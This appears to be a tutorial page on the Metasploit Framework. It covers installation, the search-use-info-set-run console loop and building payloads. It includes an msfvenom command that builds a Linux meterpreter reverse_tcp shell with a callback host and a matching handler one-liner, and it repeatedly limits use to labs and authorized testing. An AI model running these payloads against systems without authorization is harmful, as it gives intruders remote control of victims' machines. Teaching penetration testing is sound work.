Metasploit
Framework of modules, payloads and post-exploitation tools behind one console.
Metasploit is an exploitation framework that puts scanners, exploits, payloads and post-exploitation modules behind one console. Every module lists its options and the conditions it needs, so in a lab you can reproduce a known issue end to end and read the code behind it. This page covers installing the Framework, the console loop you repeat on every module, and building a payload with msfvenom.
Use it only on systems you own or are authorized to test.
Installing Metasploit
Use the official Rapid7 installer so your module set and payloads are current and trustworthy. On Kali the framework is already packaged.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall
sudo apt install metasploit-framework # KaliYour first module
Open the console with msfconsole. The loop is always the same: search for a module, read its info, set its options, and run. Reading before running keeps you out of trouble.
msf6 > search type:auxiliary portscan # Name Rank Description 0 auxiliary/scanner/portscan/tcp normal TCP Port Scanner msf6 > use auxiliary/scanner/portscan/tcp msf6 > info
search finds a module, use selects it, and info states in plain terms what it does and what it touches. You never fire something you have not read.
The console loop
With a module selected, set its options, confirm with show options that nothing is missing, and run it.
msf6 > use auxiliary/scanner/portscan/tcp msf6 > set RHOSTS 10.0.0.5 msf6 > show options msf6 > run
| Command | What it does |
|---|---|
search | Find modules by name, type, platform or CVE |
use / info | Select a module, and read what it does |
set / setg | Set an option, or a global that persists |
show options | List what a module still needs |
run / exploit | Launch the module |
sessions -i N | Interact with session number N |
Payloads with msfvenom and a handler
msfvenom builds a standalone payload in any format a lab needs, with the callback host and port baked in. You then start a matching handler so the framework is listening when the payload runs. The payload and handler must agree on type, host and port, or the session never lands.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 10.0.0.1; set LPORT 4444; run"
Meterpreter and sessions
A successful payload gives you a session. Meterpreter is the feature-rich one: it runs in memory and gives file access, process control and pivoting over one encrypted channel. List sessions with sessions -l, background one, and the post modules then automate enumeration of the host.
Practise the whole loop against a vulnerable VM such as Metasploitable. Read info on every module first, so you always know what it touches.
Install
# official installer (Linux, macOS) curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod +x msfinstall && ./msfinstall sudo apt install metasploit-framework # Kali
Example
# search for a module, then read it before running msfconsole -q -x "search type:auxiliary portscan; info auxiliary/scanner/portscan/tcp" # build a standalone payload with msfvenom msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o shell.elf
Run this against your own lab or systems you have written permission to test — nothing else.